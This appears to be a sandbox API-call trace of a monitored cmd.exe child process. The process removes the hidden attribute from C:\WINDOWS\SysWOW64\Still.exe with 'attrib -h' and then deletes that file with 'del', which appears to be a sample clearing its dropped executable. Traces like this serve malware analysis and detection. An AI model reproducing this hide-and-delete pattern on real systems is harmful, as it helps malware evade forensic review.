_wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0262.784] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0262.784] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0262.784] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0262.784] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0262.784] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0262.784] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0262.784] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0262.784] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0262.784] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0262.784] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0262.784] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0262.784] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0262.785] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0262.785] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0262.785] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0262.785] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0262.785] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0262.785] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0262.785] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0262.785] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0262.785] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0262.785] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0262.785] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0262.785] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0262.785] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0262.785] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0262.785] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0262.785] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0262.785] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0262.785] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0262.785] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0262.785] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0262.785] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0262.785] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0262.785] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0262.785] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0262.785] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0262.786] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0262.786] _wcsicmp (_String1="attrib", _String2="FOR") returned -5 [0262.786] _wcsicmp (_String1="attrib", _String2="IF") returned -8 [0262.786] _wcsicmp (_String1="attrib", _String2="REM") returned -17 [0262.786] ??_V@YAXPAX@Z () returned 0x1 [0262.786] GetProcessHeap () returned 0x3140000 [0262.786] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xffd6) returned 0x31594e0 [0262.788] GetProcessHeap () returned 0x3140000 [0262.788] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x60) returned 0x3146d60 [0262.788] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0262.788] malloc (_Size=0xffce) returned 0x32625f8 [0262.788] ??_V@YAXPAX@Z () returned 0x2eff35c [0262.789] GetProcessHeap () returned 0x3140000 [0262.789] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x1ffa4) returned 0x31694c0 [0262.792] SetErrorMode (uMode=0x0) returned 0x1 [0262.792] SetErrorMode (uMode=0x1) returned 0x0 [0262.792] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x31694c8, lpFilePart=0x2eff37c | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x2eff37c*="system32") returned 0x13 [0262.792] SetErrorMode (uMode=0x1) returned 0x1 [0262.792] GetProcessHeap () returned 0x3140000 [0262.792] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x31694c0, Size=0x3e) returned 0x31694c0 [0262.792] GetProcessHeap () returned 0x3140000 [0262.792] RtlSizeHeap (HeapHandle=0x3140000, Flags=0x0, MemoryPointer=0x31694c0) returned 0x3e [0262.792] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xd4 [0262.792] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0262.792] GetProcessHeap () returned 0x3140000 [0262.792] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x1de) returned 0x31455f8 [0262.792] GetProcessHeap () returned 0x3140000 [0262.792] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x3b4) returned 0x31457e0 [0262.792] GetProcessHeap () returned 0x3140000 [0262.793] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x31457e0, Size=0x1e0) returned 0x31457e0 [0262.793] GetProcessHeap () returned 0x3140000 [0262.793] RtlSizeHeap (HeapHandle=0x3140000, Flags=0x0, MemoryPointer=0x31457e0) returned 0x1e0 [0262.793] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0262.793] GetProcessHeap () returned 0x3140000 [0262.793] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xe0) returned 0x3146dc8 [0262.793] GetProcessHeap () returned 0x3140000 [0262.793] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x3146dc8, Size=0x76) returned 0x3146dc8 [0262.793] GetProcessHeap () returned 0x3140000 [0262.793] RtlSizeHeap (HeapHandle=0x3140000, Flags=0x0, MemoryPointer=0x3146dc8) returned 0x76 [0262.793] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.793] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eff108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eff108) returned 0x3141430 [0262.793] FindClose (in: hFindFile=0x3141430 | out: hFindFile=0x3141430) returned 1 [0262.793] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eff108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eff108) returned 0xffffffff [0262.794] GetLastError () returned 0x2 [0262.794] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eff108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eff108) returned 0x3141430 [0262.794] FindClose (in: hFindFile=0x3141430 | out: hFindFile=0x3141430) returned 1 [0262.794] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0262.794] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0262.794] ??_V@YAXPAX@Z () returned 0x1 [0262.794] GetConsoleTitleW (in: lpConsoleTitle=0x2eff60c, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SysWOW64\\cmd.exe") returned 0x1c [0262.908] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eff538, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eff524 | out: lpAttributeList=0x2eff538, lpSize=0x2eff524) returned 1 [0262.908] UpdateProcThreadAttribute (in: lpAttributeList=0x2eff538, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eff520, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eff538, lpPreviousValue=0x0) returned 1 [0262.908] GetStartupInfoW (in: lpStartupInfo=0x2eff570 | out: lpStartupInfo=0x2eff570*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\WINDOWS\\SysWOW64\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0262.908] GetProcessHeap () returned 0x3140000 [0262.908] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x18) returned 0x3141510 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0262.908] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0262.909] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0262.909] GetProcessHeap () returned 0x3140000 [0262.910] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3141510) returned 1 [0262.910] GetProcessHeap () returned 0x3140000 [0262.910] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xa) returned 0x31413e0 [0262.910] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0262.910] _get_osfhandle (_FileHandle=1) returned 0x90 [0262.910] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0263.003] _get_osfhandle (_FileHandle=0) returned 0x8c [0263.003] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x197) returned 1 [0263.136] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\attrib.exe", lpCommandLine="attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x2eff4c0*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eff50c | out: lpCommandLine="attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" ", lpProcessInformation=0x2eff50c*(hProcess=0xe4, hThread=0xe8, dwProcessId=0xba4, dwThreadId=0xdcc)) returned 1 [0263.540] CloseHandle (hObject=0xe8) returned 1 [0263.540] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0263.540] GetProcessHeap () returned 0x3140000 [0263.540] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3147b18) returned 1 [0263.540] GetEnvironmentStringsW () returned 0x3147048* [0263.540] GetProcessHeap () returned 0x3140000 [0263.540] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xac4) returned 0x3147b18 [0263.540] FreeEnvironmentStringsA (penv="=") returned 1 [0263.540] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0xffffffff) returned 0x0 [0266.583] GetExitCodeProcess (in: hProcess=0xe4, lpExitCode=0x2eff4a4 | out: lpExitCode=0x2eff4a4*=0x0) returned 1 [0266.583] CloseHandle (hObject=0xe4) returned 1 [0266.583] _vsnwprintf (in: _Buffer=0x2eff58c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eff4ac | out: _Buffer="00000000") returned 8 [0266.583] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0266.583] GetProcessHeap () returned 0x3140000 [0266.583] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3147b18) returned 1 [0266.583] GetEnvironmentStringsW () returned 0x3147048* [0266.583] GetProcessHeap () returned 0x3140000 [0266.583] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xac4) returned 0x3147b18 [0266.583] FreeEnvironmentStringsA (penv="=") returned 1 [0266.583] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0266.583] GetProcessHeap () returned 0x3140000 [0266.583] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3147b18) returned 1 [0266.583] GetEnvironmentStringsW () returned 0x3147048* [0266.584] GetProcessHeap () returned 0x3140000 [0266.584] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xac4) returned 0x3147b18 [0266.584] FreeEnvironmentStringsA (penv="=") returned 1 [0266.584] GetProcessHeap () returned 0x3140000 [0266.584] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x31413e0) returned 1 [0266.584] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eff538 | out: lpAttributeList=0x2eff538) [0266.584] ??_V@YAXPAX@Z () returned 0x1 [0266.584] GetConsoleTitleW (in: lpConsoleTitle=0x2effa98, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SysWOW64\\cmd.exe") returned 0x1c [0266.618] malloc (_Size=0xffce) returned 0x3252620 [0266.618] ??_V@YAXPAX@Z () returned 0x2eff824 [0266.618] malloc (_Size=0xffce) returned 0x32625f8 [0266.618] ??_V@YAXPAX@Z () returned 0x2eff5dc [0266.618] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0266.618] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0266.618] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0266.618] ??_V@YAXPAX@Z () returned 0x1 [0266.618] GetProcessHeap () returned 0x3140000 [0266.618] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x8c) returned 0x3146e48 [0266.618] GetProcessHeap () returned 0x3140000 [0266.618] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x3146e48, Size=0x4a) returned 0x3146e48 [0266.618] GetProcessHeap () returned 0x3140000 [0266.618] RtlSizeHeap (HeapHandle=0x3140000, Flags=0x0, MemoryPointer=0x3146e48) returned 0x4a [0266.619] GetProcessHeap () returned 0x3140000 [0266.619] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x52) returned 0x3146ea0 [0266.619] malloc (_Size=0xffce) returned 0x32625f8 [0266.619] ??_V@YAXPAX@Z () returned 0x2eff56c [0266.619] GetProcessHeap () returned 0x3140000 [0266.619] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x8c) returned 0x31459c8 [0266.619] GetProcessHeap () returned 0x3140000 [0266.619] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x31459c8, Size=0x4a) returned 0x31459c8 [0266.619] GetProcessHeap () returned 0x3140000 [0266.619] RtlSizeHeap (HeapHandle=0x3140000, Flags=0x0, MemoryPointer=0x31459c8) returned 0x4a [0266.619] GetProcessHeap () returned 0x3140000 [0266.619] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x44) returned 0x3141430 [0266.619] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x32625f8 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0266.619] malloc (_Size=0xffd2) returned 0x32725d0 [0266.620] ??_V@YAXPAX@Z () returned 0x2eff324 [0266.712] malloc (_Size=0xffd2) returned 0x32825b0 [0266.713] ??_V@YAXPAX@Z () returned 0x2efeeac [0266.713] malloc (_Size=0xffd2) returned 0x3292590 [0266.714] ??_V@YAXPAX@Z () returned 0x2efeeac [0266.714] GetProcessHeap () returned 0x3140000 [0266.714] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x38) returned 0x3146f00 [0266.714] malloc (_Size=0xffce) returned 0x32a2570 [0266.715] ??_V@YAXPAX@Z () returned 0x2efe844 [0266.715] malloc (_Size=0xffce) returned 0x32b2548 [0266.716] ??_V@YAXPAX@Z () returned 0x2efe844 [0266.719] malloc (_Size=0xffce) returned 0x32c2520 [0266.720] ??_V@YAXPAX@Z () returned 0x2efe5f4 [0266.720] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x32c2520 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0266.720] ??_V@YAXPAX@Z () returned 0x1 [0266.720] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2efe884, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x32a2570, nFileSystemNameSize=0x7fe7 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2efe884*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0266.722] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0266.722] ??_V@YAXPAX@Z () returned 0x2efe85c [0266.722] ??_V@YAXPAX@Z () returned 0x1 [0266.723] ??_V@YAXPAX@Z () returned 0x1 [0266.724] malloc (_Size=0xffce) returned 0x32a2570 [0266.725] ??_V@YAXPAX@Z () returned 0x2efec6c [0266.726] GetProcessHeap () returned 0x3140000 [0266.726] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x2c) returned 0x3145a20 [0266.726] GetProcessHeap () returned 0x3140000 [0266.726] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x258) returned 0x3145a58 [0266.726] _wcsicmp (_String1="Still.exe", _String2=".") returned 69 [0266.726] _wcsicmp (_String1="Still.exe", _String2="..") returned 69 [0266.726] GetFileAttributesW (lpFileName="C:\\WINDOWS\\SysWOW64\\Still.exe" (normalized: "c:\\windows\\syswow64\\still.exe")) returned 0x20 [0266.726] GetProcessHeap () returned 0x3140000 [0266.726] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xffd6) returned 0x3169508 [0266.726] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3169510 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0266.727] SetErrorMode (uMode=0x0) returned 0x1 [0266.727] SetErrorMode (uMode=0x1) returned 0x0 [0266.727] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\Still.exe", nBufferLength=0x7fe7, lpBuffer=0x32a2570, lpFilePart=0x2efec8c | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\Still.exe", lpFilePart=0x2efec8c*="Still.exe") returned 0x1d [0266.727] SetErrorMode (uMode=0x1) returned 0x1 [0266.727] GetFileAttributesW (lpFileName="C:\\WINDOWS\\SysWOW64" (normalized: "c:\\windows\\syswow64")) returned 0x10 [0266.727] GetProcessHeap () returned 0x3140000 [0266.727] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x258) returned 0x3145cb8 [0266.728] _wcsicmp (_String1="Still.exe", _String2=".") returned 69 [0266.728] _wcsicmp (_String1="Still.exe", _String2="..") returned 69 [0266.728] GetFileAttributesW (lpFileName="C:\\WINDOWS\\SysWOW64\\Still.exe" (normalized: "c:\\windows\\syswow64\\still.exe")) returned 0x20 [0266.728] ??_V@YAXPAX@Z () returned 0x1 [0266.728] GetProcessHeap () returned 0x3140000 [0266.728] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x1c) returned 0x3146f40 [0266.728] GetProcessHeap () returned 0x3140000 [0266.728] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x30) returned 0x3145f18 [0266.728] GetProcessHeap () returned 0x3140000 [0266.728] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x30) returned 0x3145f50 [0266.728] ??_V@YAXPAX@Z () returned 0x1 [0266.729] ??_V@YAXPAX@Z () returned 0x1 [0266.732] malloc (_Size=0xffd2) returned 0x32825b0 [0266.735] ??_V@YAXPAX@Z () returned 0x2efefe4 [0266.735] GetProcessHeap () returned 0x3140000 [0266.735] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x808) returned 0x3147048 [0266.735] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\Still.exe", fInfoLevelId=0x0, lpFindFileData=0x3147054, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3147054) returned 0x3145f88 [0266.736] malloc (_Size=0xffd2) returned 0x3292590 [0266.736] ??_V@YAXPAX@Z () returned 0x2efeb74 [0266.736] malloc (_Size=0xffd2) returned 0x32a2570 [0266.737] ??_V@YAXPAX@Z () returned 0x2efeb74 [0266.737] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0266.737] NtOpenFile (in: FileHandle=0x2efeb9c, DesiredAccess=0x10000, ObjectAttributes=0x2efeb64*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\WINDOWS\\SysWOW64\\Still.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x2efeb8c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x2efeb9c*=0xe8, IoStatusBlock=0x2efeb8c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0266.738] RtlReleaseRelativeName () returned 0x2efeb7c [0266.738] RtlFreeAnsiString (AnsiString="\\") [0266.738] NtQueryVolumeInformationFile (in: FileHandle=0xe8, IoStatusBlock=0x2efeac8, FsInformation=0x2efead0, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x2efeac8, FsInformation=0x2efead0) returned 0x0 [0266.738] CloseHandle (hObject=0xe8) returned 1 [0266.740] ??_V@YAXPAX@Z () returned 0x1 [0266.740] ??_V@YAXPAX@Z () returned 0x1 [0266.741] FindNextFileW (in: hFindFile=0x3145f88, lpFindFileData=0x3147054 | out: lpFindFileData=0x3147054*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2c319f0, ftCreationTime.dwHighDateTime=0x1d63873, ftLastAccessTime.dwLowDateTime=0xe2c319f0, ftLastAccessTime.dwHighDateTime=0x1d63873, ftLastWriteTime.dwLowDateTime=0xe2cf01c5, ftLastWriteTime.dwHighDateTime=0x1d63873, nFileSizeHigh=0x0, nFileSizeLow=0x114190, dwReserved0=0x0, dwReserved1=0x0, cFileName="Still.exe", cAlternateFileName="")) returned 0 [0266.741] GetLastError () returned 0x12 [0266.741] FindClose (in: hFindFile=0x3145f88 | out: hFindFile=0x3145f88) returned 1 [0266.741] ??_V@YAXPAX@Z () returned 0x1 [0266.744] GetProcessHeap () returned 0x3140000 [0266.744] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3147048) returned 1 [0266.744] GetProcessHeap () returned 0x3140000 [0266.744] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3145f50) returned 1 [0266.744] GetProcessHeap () returned 0x3140000 [0266.744] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3146f40) returned 1 [0266.744] GetProcessHeap () returned 0x3140000 [0266.744] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3145f18) returned 1 [0266.744] ??_V@YAXPAX@Z () returned 0x1 [0266.747] GetProcessHeap () returned 0x3140000 [0266.747] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3145cb8) returned 1 [0266.747] GetProcessHeap () returned 0x3140000 [0266.747] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3169508) returned 1 [0266.747] GetProcessHeap () returned 0x3140000 [0266.747] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3145a58) returned 1 [0266.747] GetProcessHeap () returned 0x3140000 [0266.747] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3145a20) returned 1 [0266.747] GetProcessHeap () returned 0x3140000 [0266.747] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3146f00) returned 1 [0266.747] GetProcessHeap () returned 0x3140000 [0266.747] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3141430) returned 1 [0266.747] GetProcessHeap () returned 0x3140000 [0266.747] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x31459c8) returned 1 [0266.747] ??_V@YAXPAX@Z () returned 0x1 [0266.759] ??_V@YAXPAX@Z () returned 0x1 [0266.762] _get_osfhandle (_FileHandle=1) returned 0x90 [0266.762] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0266.804] _get_osfhandle (_FileHandle=1) returned 0x90 [0266.804] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac3890 | out: lpMode=0xac3890) returned 1 [0266.886] _get_osfhandle (_FileHandle=1) returned 0x90 [0266.886] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0266.927] _get_osfhandle (_FileHandle=0) returned 0x8c [0266.927] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3894 | out: lpMode=0xac3894) returned 1 [0266.961] _get_osfhandle (_FileHandle=0) returned 0x8c [0266.961] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x187) returned 1 [0267.012] SetConsoleInputExeNameW () returned 0x1 [0267.012] GetConsoleOutputCP () returned 0x1b5 [0267.049] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0267.049] SetThreadUILanguage (LangId=0x0) returned 0x2cb0409 [0267.118] exit (_Code=0) [0267.118] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 578 os_tid = 0x1138 Process: id = "40" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5590b000" os_pid = "0x13d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" 